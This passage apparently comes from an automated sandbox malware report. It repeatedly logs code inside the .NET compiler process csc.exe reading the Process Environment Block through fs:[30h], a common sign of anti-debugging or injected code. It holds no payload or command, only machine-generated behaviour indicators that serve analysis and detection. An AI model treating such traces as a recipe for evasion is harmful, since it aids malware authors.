          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C1460 mov eax, dword ptr fs:[00000030h]5_2_055C1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C1460 mov eax, dword ptr fs:[00000030h]5_2_055C1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C1460 mov eax, dword ptr fs:[00000030h]5_2_055C1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]5_2_055DF460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]5_2_055DF460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]5_2_055DF460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]5_2_055DF460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]5_2_055DF460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]5_2_055DF460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]5_2_05646420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]5_2_05646420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]5_2_05646420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]5_2_05646420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]5_2_05646420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]5_2_05646420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]5_2_05646420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E340D mov eax, dword ptr fs:[00000030h]5_2_055E340D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F8402 mov eax, dword ptr fs:[00000030h]5_2_055F8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F8402 mov eax, dword ptr fs:[00000030h]5_2_055F8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F8402 mov eax, dword ptr fs:[00000030h]5_2_055F8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FA430 mov eax, dword ptr fs:[00000030h]5_2_055FA430
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05647410 mov eax, dword ptr fs:[00000030h]5_2_05647410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BE420 mov eax, dword ptr fs:[00000030h]5_2_055BE420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BE420 mov eax, dword ptr fs:[00000030h]5_2_055BE420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BE420 mov eax, dword ptr fs:[00000030h]5_2_055BE420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BC427 mov eax, dword ptr fs:[00000030h]5_2_055BC427
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056694E0 mov eax, dword ptr fs:[00000030h]5_2_056694E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056954DB mov eax, dword ptr fs:[00000030h]5_2_056954DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C04E5 mov ecx, dword ptr fs:[00000030h]5_2_055C04E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564A4B0 mov eax, dword ptr fs:[00000030h]5_2_0564A4B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C9486 mov eax, dword ptr fs:[00000030h]5_2_055C9486
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C9486 mov eax, dword ptr fs:[00000030h]5_2_055C9486
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BB480 mov eax, dword ptr fs:[00000030h]5_2_055BB480
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F34B0 mov eax, dword ptr fs:[00000030h]5_2_055F34B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F44B0 mov ecx, dword ptr fs:[00000030h]5_2_055F44B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C64AB mov eax, dword ptr fs:[00000030h]5_2_055C64AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C0750 mov eax, dword ptr fs:[00000030h]5_2_055C0750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F674D mov esi, dword ptr fs:[00000030h]5_2_055F674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F674D mov eax, dword ptr fs:[00000030h]5_2_055F674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F674D mov eax, dword ptr fs:[00000030h]5_2_055F674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D3740 mov eax, dword ptr fs:[00000030h]5_2_055D3740
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D3740 mov eax, dword ptr fs:[00000030h]5_2_055D3740
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D3740 mov eax, dword ptr fs:[00000030h]5_2_055D3740
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05693749 mov eax, dword ptr fs:[00000030h]5_2_05693749
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C8770 mov eax, dword ptr fs:[00000030h]5_2_055C8770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]5_2_055D0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602750 mov eax, dword ptr fs:[00000030h]5_2_05602750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602750 mov eax, dword ptr fs:[00000030h]5_2_05602750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05644755 mov eax, dword ptr fs:[00000030h]5_2_05644755
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564E75D mov eax, dword ptr fs:[00000030h]5_2_0564E75D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BB765 mov eax, dword ptr fs:[00000030h]5_2_055BB765
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BB765 mov eax, dword ptr fs:[00000030h]5_2_055BB765
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BB765 mov eax, dword ptr fs:[00000030h]5_2_055BB765
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BB765 mov eax, dword ptr fs:[00000030h]5_2_055BB765
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FF71F mov eax, dword ptr fs:[00000030h]5_2_055FF71F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FF71F mov eax, dword ptr fs:[00000030h]5_2_055FF71F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568972B mov eax, dword ptr fs:[00000030h]5_2_0568972B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567F72E mov eax, dword ptr fs:[00000030h]5_2_0567F72E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C0710 mov eax, dword ptr fs:[00000030h]5_2_055C0710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F0710 mov eax, dword ptr fs:[00000030h]5_2_055F0710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563C730 mov eax, dword ptr fs:[00000030h]5_2_0563C730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0569B73C mov eax, dword ptr fs:[00000030h]5_2_0569B73C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0569B73C mov eax, dword ptr fs:[00000030h]5_2_0569B73C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0569B73C mov eax, dword ptr fs:[00000030h]5_2_0569B73C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0569B73C mov eax, dword ptr fs:[00000030h]5_2_0569B73C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C5702 mov eax, dword ptr fs:[00000030h]5_2_055C5702
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C5702 mov eax, dword ptr fs:[00000030h]5_2_055C5702
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C7703 mov eax, dword ptr fs:[00000030h]5_2_055C7703
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FC700 mov eax, dword ptr fs:[00000030h]5_2_055FC700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F273C mov eax, dword ptr fs:[00000030h]5_2_055F273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F273C mov ecx, dword ptr fs:[00000030h]5_2_055F273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F273C mov eax, dword ptr fs:[00000030h]5_2_055F273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C973A mov eax, dword ptr fs:[00000030h]5_2_055C973A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C973A mov eax, dword ptr fs:[00000030h]5_2_055C973A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B9730 mov eax, dword ptr fs:[00000030h]5_2_055B9730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B9730 mov eax, dword ptr fs:[00000030h]5_2_055B9730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F5734 mov eax, dword ptr fs:[00000030h]5_2_055F5734
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C3720 mov eax, dword ptr fs:[00000030h]5_2_055C3720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DF720 mov eax, dword ptr fs:[00000030h]5_2_055DF720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DF720 mov eax, dword ptr fs:[00000030h]5_2_055DF720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DF720 mov eax, dword ptr fs:[00000030h]5_2_055DF720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FC720 mov eax, dword ptr fs:[00000030h]5_2_055FC720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FC720 mov eax, dword ptr fs:[00000030h]5_2_055FC720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564E7E1 mov eax, dword ptr fs:[00000030h]5_2_0564E7E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CC7C0 mov eax, dword ptr fs:[00000030h]5_2_055CC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C57C0 mov eax, dword ptr fs:[00000030h]5_2_055C57C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C57C0 mov eax, dword ptr fs:[00000030h]5_2_055C57C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C57C0 mov eax, dword ptr fs:[00000030h]5_2_055C57C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C47FB mov eax, dword ptr fs:[00000030h]5_2_055C47FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C47FB mov eax, dword ptr fs:[00000030h]5_2_055C47FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056407C3 mov eax, dword ptr fs:[00000030h]5_2_056407C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E27ED mov eax, dword ptr fs:[00000030h]5_2_055E27ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E27ED mov eax, dword ptr fs:[00000030h]5_2_055E27ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E27ED mov eax, dword ptr fs:[00000030h]5_2_055E27ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CD7E0 mov ecx, dword ptr fs:[00000030h]5_2_055CD7E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564F7AF mov eax, dword ptr fs:[00000030h]5_2_0564F7AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564F7AF mov eax, dword ptr fs:[00000030h]5_2_0564F7AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564F7AF mov eax, dword ptr fs:[00000030h]5_2_0564F7AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564F7AF mov eax, dword ptr fs:[00000030h]5_2_0564F7AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564F7AF mov eax, dword ptr fs:[00000030h]5_2_0564F7AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056497A9 mov eax, dword ptr fs:[00000030h]5_2_056497A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056937B6 mov eax, dword ptr fs:[00000030h]5_2_056937B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]5_2_055BF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]5_2_055BF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]5_2_055BF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]5_2_055BF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]5_2_055BF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]5_2_055BF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]5_2_055BF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]5_2_055BF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]5_2_055BF7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567F78A mov eax, dword ptr fs:[00000030h]5_2_0567F78A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055ED7B0 mov eax, dword ptr fs:[00000030h]5_2_055ED7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C07AF mov eax, dword ptr fs:[00000030h]5_2_055C07AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568866E mov eax, dword ptr fs:[00000030h]5_2_0568866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568866E mov eax, dword ptr fs:[00000030h]5_2_0568866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DC640 mov eax, dword ptr fs:[00000030h]5_2_055DC640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F2674 mov eax, dword ptr fs:[00000030h]5_2_055F2674
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FA660 mov eax, dword ptr fs:[00000030h]5_2_055FA660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FA660 mov eax, dword ptr fs:[00000030h]5_2_055FA660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F9660 mov eax, dword ptr fs:[00000030h]5_2_055F9660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F9660 mov eax, dword ptr fs:[00000030h]5_2_055F9660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C3616 mov eax, dword ptr fs:[00000030h]5_2_055C3616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C3616 mov eax, dword ptr fs:[00000030h]5_2_055C3616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]5_2_055D260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]5_2_055D260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]5_2_055D260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]5_2_055D260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]5_2_055D260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]5_2_055D260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]5_2_055D260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F1607 mov eax, dword ptr fs:[00000030h]5_2_055F1607
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FF603 mov eax, dword ptr fs:[00000030h]5_2_055FF603
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05695636 mov eax, dword ptr fs:[00000030h]5_2_05695636
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563E609 mov eax, dword ptr fs:[00000030h]5_2_0563E609
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C262C mov eax, dword ptr fs:[00000030h]5_2_055C262C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05602619 mov eax, dword ptr fs:[00000030h]5_2_05602619
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DE627 mov eax, dword ptr fs:[00000030h]5_2_055DE627
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]5_2_055BF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]5_2_055BF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]5_2_055BF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]5_2_055BF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]5_2_055BF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]5_2_055BF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]5_2_055BF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]5_2_055BF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]5_2_055BF626
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F6620 mov eax, dword ptr fs:[00000030h]5_2_055F6620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F8620 mov eax, dword ptr fs:[00000030h]5_2_055F8620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]5_2_056536EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]5_2_056536EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]5_2_056536EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]5_2_056536EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]5_2_056536EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]5_2_056536EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F16CF mov eax, dword ptr fs:[00000030h]5_2_055F16CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563E6F2 mov eax, dword ptr fs:[00000030h]5_2_0563E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563E6F2 mov eax, dword ptr fs:[00000030h]5_2_0563E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563E6F2 mov eax, dword ptr fs:[00000030h]5_2_0563E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563E6F2 mov eax, dword ptr fs:[00000030h]5_2_0563E6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056406F1 mov eax, dword ptr fs:[00000030h]5_2_056406F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056406F1 mov eax, dword ptr fs:[00000030h]5_2_056406F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567D6F0 mov eax, dword ptr fs:[00000030h]5_2_0567D6F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FA6C7 mov ebx, dword ptr fs:[00000030h]5_2_055FA6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FA6C7 mov eax, dword ptr fs:[00000030h]5_2_055FA6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]5_2_055CB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]5_2_055CB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]5_2_055CB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]5_2_055CB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]5_2_055CB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]5_2_055CB6C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567F6C7 mov eax, dword ptr fs:[00000030h]5_2_0567F6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056816CC mov eax, dword ptr fs:[00000030h]5_2_056816CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056816CC mov eax, dword ptr fs:[00000030h]5_2_056816CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056816CC mov eax, dword ptr fs:[00000030h]5_2_056816CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_056816CC mov eax, dword ptr fs:[00000030h]5_2_056816CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F36EF mov eax, dword ptr fs:[00000030h]5_2_055F36EF
